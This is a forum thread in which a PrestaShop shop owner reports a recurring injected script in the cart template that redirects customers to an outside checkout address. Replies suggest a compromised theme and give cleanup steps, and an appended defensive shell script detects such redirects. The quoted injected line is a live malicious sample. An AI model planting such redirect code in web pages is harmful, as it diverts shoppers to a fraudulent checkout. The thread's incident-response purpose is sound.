p4presta Posted July 9, 2016

Hi All,

Our customers were being redirected from the cart / orders page to the following address:
http://cwcargo.com/Checkout

On doing a search on the files, we found the below malicious code within the shopping-cart.tpl:

<script>document.location="http://cwcargo.com/Checkout"</script>

Apart from deleting this code and changing FTP passwords, what can we do to prevent this?

We are using PrestaShop version 1.6.0.8 and a third-party theme.

Thanks in advance

endriu107 Posted July 9, 2016

What is the theme name?

musicmaster Posted July 9, 2016

If you look around the forum you will see that there are a lot of issues about hacked sites at the moment and that the main reason is some theme that has been hacked. So it is important that you answer the question of Endriu. If indeed you have one of the hacked themes, then you would need to do a much more radical cleanup than you are doing now.

p4presta (Author) Posted July 9, 2016

Thanks for your replies.

The theme is called Autumn.

vekia Posted July 9, 2016

Did you find the malicious code? What does it look like? Can you share it here?

p4presta (Author) Posted July 9, 2016

Vekia, see below:

<script>document.location="http://cwcargo.com/Checkout"</script>

I've cleaned it once but it's back again.

El Patron Posted July 10, 2016

Follow this path, it may help.

First change all FTP passwords, and make sure you have up-to-date virus protection on your local computer.

Using FTP, download your shop files to your computer (here we expect to catch the virus/trojan). Key is to get current anti-virus to scan your shop files on your computer... typically they infect/inject a .js file... these then modify other files you might have already fixed, but they come back.

(To replace files of native PS) ... download your version from PS and unzip it for later reference.

(To replace files of theme) get the original source of your downloaded theme.

Also, using FTP or hosting control panel (files), sort files by date, looking for files that have been updated recently...

Note: folder 755, files 644 (is typical permissions).

Then hopefully with other tips you can resolve; then consider this module (by me).

https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/

Also see this from the themeforest comments section, search 'hacked':

https://themeforest.net/item/autumn-responsive-prestashop-16-theme-with-blog/3848244/comments?utf8=%E2%9C%93&term=hacked&from_buyers_and_authors_only=0

Edited July 10, 2016 by El Patron

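The checks described in the post above (search for the injected redirect, look for recently changed files, verify 755/644 permissions, compare against the original theme or PrestaShop files), as an added example to run against a local copy of the shop. It is not from the thread or from PrestaShop; the function names, the file-extension list and the 14-day default are assumptions.

```shell
#!/bin/sh
# Added example: audit a local (FTP-downloaded) copy of a shop.
# Function names, extension list and the 14-day default are assumptions.

# Matches a script assigning document.location / window.location(.href)
# to an absolute http(s) URL, as in the injected shopping-cart.tpl line.
REDIRECT_RE="(document|window)\.location(\.href)?[[:space:]]*=[[:space:]]*[\"']https?://"

# $1 = shop dir. Prints file:line:text for each redirect assignment.
# /dev/null forces grep to print the file name even for a single file.
find_redirects() {
    find "$1" -type f \( -name '*.tpl' -o -name '*.js' -o -name '*.php' \
        -o -name '*.html' \) -exec grep -nE "$REDIRECT_RE" /dev/null {} + | sort
}

# $1 = shop dir, $2 = days. Files modified within the last $2 days.
recently_modified() {
    find "$1" -type f -mtime -"$2" | sort
}

# $1 = shop dir. Anything that is not the typical 644 (files) / 755 (folders).
odd_permissions() {
    find "$1" \( -type f ! -perm 644 \) -o \( -type d ! -perm 755 \) | sort
}

# $1 = pristine copy (original theme / PrestaShop archive), $2 = shop dir.
# Lists files whose content differs or that exist on one side only.
changed_vs_original() {
    diff -rq "$1" "$2" | sort
}

# Usage: sh audit.sh SHOP_DIR [ORIGINAL_DIR]
if [ "$#" -ge 1 ]; then
    days="${DAYS:-14}"
    echo "== redirect assignments ==";            find_redirects "$1"
    echo "== modified in the last $days days =="; recently_modified "$1" "$days"
    echo "== permissions other than 644/755 ==";  odd_permissions "$1"
    if [ "$#" -ge 2 ]; then
        echo "== differs from original copy =="; changed_vs_original "$2" "$1"
    fi
fi
```

The redirect pattern only catches the plain form seen in this thread; the comparison against a pristine copy also surfaces obfuscated or differently written injections, and the modification-date check helps find the file that keeps re-inserting the code.
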
p4presta (Author) Posted July 12, 2016

Thank you El Patron - shall definitely look into your module.